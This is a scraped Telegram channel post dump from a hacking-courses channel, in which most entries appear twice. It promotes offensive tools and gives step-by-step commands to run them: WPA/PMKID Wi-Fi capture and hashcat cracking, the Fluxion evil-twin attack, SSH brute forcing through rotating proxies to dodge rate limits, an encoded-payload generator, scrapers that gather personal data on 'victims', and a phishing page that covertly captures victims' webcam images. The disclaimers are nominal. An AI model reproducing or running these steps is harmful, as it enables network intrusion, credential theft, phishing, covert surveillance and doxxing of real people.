Complete Linux Training Course
Download link-
https://drive.google.com/drive/folders/1-is9JovkcB4gjnNRMhtX5AsB2lyxOaVp
Don't Forget To React
ᴊᴏɪɴ ꜰᴏʀ ᴍᴏʀᴇ ›
@hackingcourses07
Download link-
https://drive.google.com/drive/folders/1-is9JovkcB4gjnNRMhtX5AsB2lyxOaVp
Don't Forget To React
ᴊᴏɪɴ ꜰᴏʀ ᴍᴏʀᴇ ›
@hackingcourses07
❤1👍1
Termux
¶¶ Fluxion-on-esp8266 This is a Advance Fluxion tool on esp8266... #esp8266 https://github.com/pitube08642/Fluxion-on-ESP8266 ¶¶ android app https://play.google.com/store/apps/details?id=com.bluino.esploader ¶¶ more info about Esp8266 https://create.…
espCaptivePortal.bin
295.8 KB
Termux
wifite2.zip
Media is too big
VIEW IN TELEGRAM
nethunter on (Samsung note9 )
Monitor mode & packet injection works
HID= Not working
USB: 2/3
realtek /mediatek / and atheros adapters works
includes : alfa adapters if you have a samsung note9 rooted
DM only if you have samsung note9 V=9 and V=11
RTL8192EU
RTL8188EUS
RTL8812AU
Mediatek = MT7601U
Atheros AR9271
#wifite2 #wps #wpa #wpa2 #hashcat
Monitor mode & packet injection works
HID= Not working
USB: 2/3
realtek /mediatek / and atheros adapters works
includes : alfa adapters if you have a samsung note9 rooted
DM only if you have samsung note9 V=9 and V=11
RTL8192EU
RTL8188EUS
RTL8812AU
Mediatek = MT7601U
Atheros AR9271
#wifite2 #wps #wpa #wpa2 #hashcat
👍3❤1
Media is too big
VIEW IN TELEGRAM
#nethunter #wifihacking #wpa #wpa2
#androidtools #TermuxToolx #pmkidhashcrack #pmkid #hashcat #samsungnote9 #android #gpu
¶¶https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick
COMMANDS //
📍sudo systemctl stop NetworkManager.service
📍sudo systemctl stop wpa_supplicant.service
📍sudo hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15
📍sudo systemctl start wpa_supplicant.service
📍sudo systemctl start NetworkManager.service
📍hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
📍hashcat -m 22000 hash.hc22000 wordlist.txt
¶¶ Windows:
📍hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
📍hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 14 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d
#androidtools #TermuxToolx #pmkidhashcrack #pmkid #hashcat #samsungnote9 #android #gpu
¶¶https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick
COMMANDS //
📍sudo systemctl stop NetworkManager.service
📍sudo systemctl stop wpa_supplicant.service
📍sudo hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15
📍sudo systemctl start wpa_supplicant.service
📍sudo systemctl start NetworkManager.service
📍hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
📍hashcat -m 22000 hash.hc22000 wordlist.txt
¶¶ Windows:
📍hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
📍hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 14 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d
👍4👌2
Skiptracer - OSINT scraping framework
Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Skiptracer utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.
Installation
$ git clone https://github.com/xillwillx/skiptracer.git skiptracer
$ cd skiptracer
Install requirements
$ pip install -r requirements.txt
Run
$ python skiptracer.py -l (phone|email|sn|name|plate)
The modules will allow queries for the following:
- Phone
- Email
- Screen names
- Real names
- Addresses
- IP
- Hostname
- Breach Credentials
Disclaimer:- This project was created for educational purposes and should not be used in environments without legal authorization.
https://gitlab.com/illwill/skiptracer
Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Skiptracer utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.
Installation
$ git clone https://github.com/xillwillx/skiptracer.git skiptracer
$ cd skiptracer
Install requirements
$ pip install -r requirements.txt
Run
$ python skiptracer.py -l (phone|email|sn|name|plate)
The modules will allow queries for the following:
- Phone
- Screen names
- Real names
- Addresses
- IP
- Hostname
- Breach Credentials
Disclaimer:- This project was created for educational purposes and should not be used in environments without legal authorization.
https://gitlab.com/illwill/skiptracer
👍4❤1
fluxion.zip
11.1 MB
☰☲☷ FLU [X] I0N ☰☲☷
☲ WI-FI ☲
Ver: 6.9
Installation:-
cp $(find /sdcard/Download -name fluxion.zip) ./;unzip fluxion.zip && rm -rf fluxion.zip;cd fluxion;mv fluxion /usr/bin;chmod 755 /usr/bin/fluxion;cd .. && mv fluxion /usr/share
Howto? (make sure to run user interface in vnc/kex as root)
Now you can just type fluxion and done ;)
☲ WI-FI ☲
Ver: 6.9
Installation:-
cp $(find /sdcard/Download -name fluxion.zip) ./;unzip fluxion.zip && rm -rf fluxion.zip;cd fluxion;mv fluxion /usr/bin;chmod 755 /usr/bin/fluxion;cd .. && mv fluxion /usr/share
Howto? (make sure to run user interface in vnc/kex as root)
Now you can just type fluxion and done ;)
👍2
Orbitaldump:-- A Simple Multi-Threaded Distributed SSH Brute-Forcing Tool Written In Python.
When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing script. When the --proxies switch is added, the script pulls a list (usually thousands) of SOCKS4 proxies from ProxyScrape and launch all brute-force attacks over the SOCKS4 proxies so brute-force attempts will be less likely to be rate-limited by the target host.
Usages:-
https://github.com/k4yt3x/orbitaldump
Note:- This tool is only for educational purposes. We are not responsible for any misuse or illegal activities.
Facebook Page:-
https://www.facebook.com/ZeroDayExploitware
When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing script. When the --proxies switch is added, the script pulls a list (usually thousands) of SOCKS4 proxies from ProxyScrape and launch all brute-force attacks over the SOCKS4 proxies so brute-force attempts will be less likely to be rate-limited by the target host.
Usages:-
https://github.com/k4yt3x/orbitaldump
Note:- This tool is only for educational purposes. We are not responsible for any misuse or illegal activities.
Facebook Page:-
https://www.facebook.com/ZeroDayExploitware
❤2👍1
¶¶ waf-bypass
Check your WAF before an attacker does
WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.
📍git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
📍python3 -m pip install -r /opt/waf-bypass/requirements.txt
📍python3 /opt/waf-bypass/main.py --host='example.com'
Check your WAF before an attacker does
WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.
📍git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
📍python3 -m pip install -r /opt/waf-bypass/requirements.txt
📍python3 /opt/waf-bypass/main.py --host='example.com'
👍1
¶¶ Beta_Nicco
An advance payload generation tool which automates your payload creation work. It also features some feature like ;-
sudo apt-get update && sudo apt-get upgrade -y
📍git clone https://github.com/empath1928/Beta_Nicco
📍cd Beta_Nicco
📍ls
📍chmod +x setup.sh
📍./setup.sh OR bash setup.sh
[ 1 ] ---> Payload for any platform
[ 2 ] ---> Encoding the payload for aviation
[ 3 ] ---> Auto listner as well as Custom for easy process
An advance payload generation tool which automates your payload creation work. It also features some feature like ;-
sudo apt-get update && sudo apt-get upgrade -y
📍git clone https://github.com/empath1928/Beta_Nicco
📍cd Beta_Nicco
📍ls
📍chmod +x setup.sh
📍./setup.sh OR bash setup.sh
[ 1 ] ---> Payload for any platform
[ 2 ] ---> Encoding the payload for aviation
[ 3 ] ---> Auto listner as well as Custom for easy process
❤1👍1
¶¶ INFO-X
Info-X is a information gathering tool...with this tool You can get vectims like ip , gmail , phone number information
#osint #info #ip #phonenumber
📍pkg update
📍pkg upgrade
📍pkg install python
📍pkg install git
📍pip install requests
📍pip install bs4
📍pip install futures
📍pip install mechanize
📍cd $HOME
📍rm -rf INFO-X
📍git clone --depth=1 https://github.com/U7P4L-IN/INFO-X.git
📍cd INFO-X
📍python INFO.py
[01] Track IP Address
[02] Phone Number Info
[03] E-Mail Info
[04] More Tools
[05] Contract Me
[00] Exit
Info-X is a information gathering tool...with this tool You can get vectims like ip , gmail , phone number information
#osint #info #ip #phonenumber
📍pkg update
📍pkg upgrade
📍pkg install python
📍pkg install git
📍pip install requests
📍pip install bs4
📍pip install futures
📍pip install mechanize
📍cd $HOME
📍rm -rf INFO-X
📍git clone --depth=1 https://github.com/U7P4L-IN/INFO-X.git
📍cd INFO-X
📍python INFO.py
[01] Track IP Address
[02] Phone Number Info
[03] E-Mail Info
[04] More Tools
[05] Contract Me
[00] Exit
👍11❤6
¶¶ https://osintframework.com/
OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.
#osint
------------------------
Documentation
OpSec
Threat Intelligence
Exploits & Advisories
Malicious File Analysis
Tools
Encoding / Decoding
Classifieds
Digital Currency
Dark Web
Terrorism
Mobile Emulation
Metadata
Language Translation
Archives
Forums / Blogs / IRC
Search Engines
Geolocation Tools / Maps
Transportation
Business Records
Public Records
Telephone Numbers
Dating
People Search Engines
Instant Messaging
Social Networks
Images / Videos / Docs
IP Address
Domain Name
OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.
#osint
------------------------
Documentation
OpSec
Threat Intelligence
Exploits & Advisories
Malicious File Analysis
Tools
Encoding / Decoding
Classifieds
Digital Currency
Dark Web
Terrorism
Mobile Emulation
Metadata
Language Translation
Archives
Forums / Blogs / IRC
Search Engines
Geolocation Tools / Maps
Transportation
Business Records
Public Records
Telephone Numbers
Dating
People Search Engines
Instant Messaging
Social Networks
Images / Videos / Docs
IP Address
Domain Name
¶¶ tidos-framework
The Offensive Manual Web Application Penetration Testing Framework. #recon #kalitools #nethunter
📍git clone https://github.com/0xinfection/tidos-framework.git
📍cd tidos-framework
📍sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python3-pip libmariadbclient18 libmysqlclient-dev tor konsole
📍pip3 install -r requirements.txt
📍sudo python3 tidconsole.py
📍sudo git pull ( to update to latest )
¶¶ need to set your own API KEYS for various OSINT & Scanning and Enumeration purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS.
¶¶ Comands
📍list all
-----
aid
infdisc
osint-active
osint-passive
post
scan
sploit
vlnysis
📍load or load all ( or list all )
📍vicdel all (remove all added url)
📍vicadd (after that url example google.com)
📍info
📍attack
¶¶ Youtube link : https://youtu.be/8SZXnhCvUXc
The Offensive Manual Web Application Penetration Testing Framework. #recon #kalitools #nethunter
📍git clone https://github.com/0xinfection/tidos-framework.git
📍cd tidos-framework
📍sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python3-pip libmariadbclient18 libmysqlclient-dev tor konsole
📍pip3 install -r requirements.txt
📍sudo python3 tidconsole.py
📍sudo git pull ( to update to latest )
¶¶ need to set your own API KEYS for various OSINT & Scanning and Enumeration purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS.
¶¶ Comands
📍list all
-----
aid
infdisc
osint-active
osint-passive
post
scan
sploit
vlnysis
📍load or load all ( or list all )
📍vicdel all (remove all added url)
📍vicadd (after that url example google.com)
📍info
📍attack
¶¶ Youtube link : https://youtu.be/8SZXnhCvUXc
👍4❤1
¶¶ symbiote
Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. IP / Device Details By requesting camera permission on the victim's device,
#ip #device #info #browser #phishing #camera #seeker #vidphisher #storm-breaker #ngrok #localhost
📍sudo apt update && upgrade
📍sudo apt install python -y
📍sudo apt install wget -y
📍sudo apt install php -y
📍sudo apt install openssh-client -y
📍sudo apt install jq -y
📍sudo ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa <<<y >/dev/null 2>&1
📍git clone https://github.com/hasanfirnas/symbiote
📍cd symbiote
📍python3 symbiote.py
📍cd Server
📍./loclx account login
now enter your access token from https://localxpose.io/
¶¶ To check for cam file :
📍cd symbiote
📍cd CapturedData
📍ls
📍termux-open <file_name>
¶¶ Youtube link :
https://youtu.be/j8rTc3CI7UA
Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. IP / Device Details By requesting camera permission on the victim's device,
#ip #device #info #browser #phishing #camera #seeker #vidphisher #storm-breaker #ngrok #localhost
📍sudo apt update && upgrade
📍sudo apt install python -y
📍sudo apt install wget -y
📍sudo apt install php -y
📍sudo apt install openssh-client -y
📍sudo apt install jq -y
📍sudo ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa <<<y >/dev/null 2>&1
📍git clone https://github.com/hasanfirnas/symbiote
📍cd symbiote
📍python3 symbiote.py
📍cd Server
📍./loclx account login
now enter your access token from https://localxpose.io/
¶¶ To check for cam file :
📍cd symbiote
📍cd CapturedData
📍ls
📍termux-open <file_name>
¶¶ Youtube link :
https://youtu.be/j8rTc3CI7UA
❤6👍3
¶¶ SWS-Recon-Tool
SWS-Recon is a Python Tool designed to performed Reconnaissance on the given target website- Domain or SubDomain. SWS-Recon collects information such as Google Dork, DNS Information, Sub Domains, PortScan, Subdomain takeovers, Reconnaissance On Github and much more vulnerability scan. #recon #osint #info #nethunter
📍sudo apt-get install libxml2-dev libxslt-dev
📍git clone https://github.com/ShobhitMishra-bot/SWS-Recon-Tool.git
📍cd SWS-Recon-Tool
📍pip3 install -r requirements.txt
📍python3 SWS-Recon.py -h
SWS-Recon is a Python Tool designed to performed Reconnaissance on the given target website- Domain or SubDomain. SWS-Recon collects information such as Google Dork, DNS Information, Sub Domains, PortScan, Subdomain takeovers, Reconnaissance On Github and much more vulnerability scan. #recon #osint #info #nethunter
📍sudo apt-get install libxml2-dev libxslt-dev
📍git clone https://github.com/ShobhitMishra-bot/SWS-Recon-Tool.git
📍cd SWS-Recon-Tool
📍pip3 install -r requirements.txt
📍python3 SWS-Recon.py -h
👍3
¶¶phisherprice
Multi-Functional Pentest Tool, Command Them All From One Script. #recon #cracking #Th3inspector #networking #TermuxToolx #nethunter
📍git clone https://github.com/SirCryptic/phisherprice
📍cd phisherprice
📍chmod +x phisherprice.sh
📍sudo ./phisherprice.sh
or
📍sudo bash phisherprice.sh
¶¶ Changing API Key :
¶¶ Example : sudo nano phisherprice.sh
https://rapidapi.com/blackbunny/api/bank-card-bin-num-check
https://apilayer.com/marketplace/email_verification-api
https://apilayer.com/marketplace/number_verification-api
https://www.shodan.io
│Main Menu
├──────────────────
│1 │Recon
│2 │Cracking
│3 │AutoxSploits
│4 │Networking
│5 │C.Y.O xSploits
│6 │AutoExif
│7 │SE Toolkit
│8 │Start Th3inspector
│u │Update Script
│c │Contact Information
├───────────────
Multi-Functional Pentest Tool, Command Them All From One Script. #recon #cracking #Th3inspector #networking #TermuxToolx #nethunter
📍git clone https://github.com/SirCryptic/phisherprice
📍cd phisherprice
📍chmod +x phisherprice.sh
📍sudo ./phisherprice.sh
or
📍sudo bash phisherprice.sh
¶¶ Changing API Key :
¶¶ Example : sudo nano phisherprice.sh
https://rapidapi.com/blackbunny/api/bank-card-bin-num-check
https://apilayer.com/marketplace/email_verification-api
https://apilayer.com/marketplace/number_verification-api
https://www.shodan.io
│Main Menu
├──────────────────
│1 │Recon
│2 │Cracking
│3 │AutoxSploits
│4 │Networking
│5 │C.Y.O xSploits
│6 │AutoExif
│7 │SE Toolkit
│8 │Start Th3inspector
│u │Update Script
│c │Contact Information
├───────────────
❤4👍4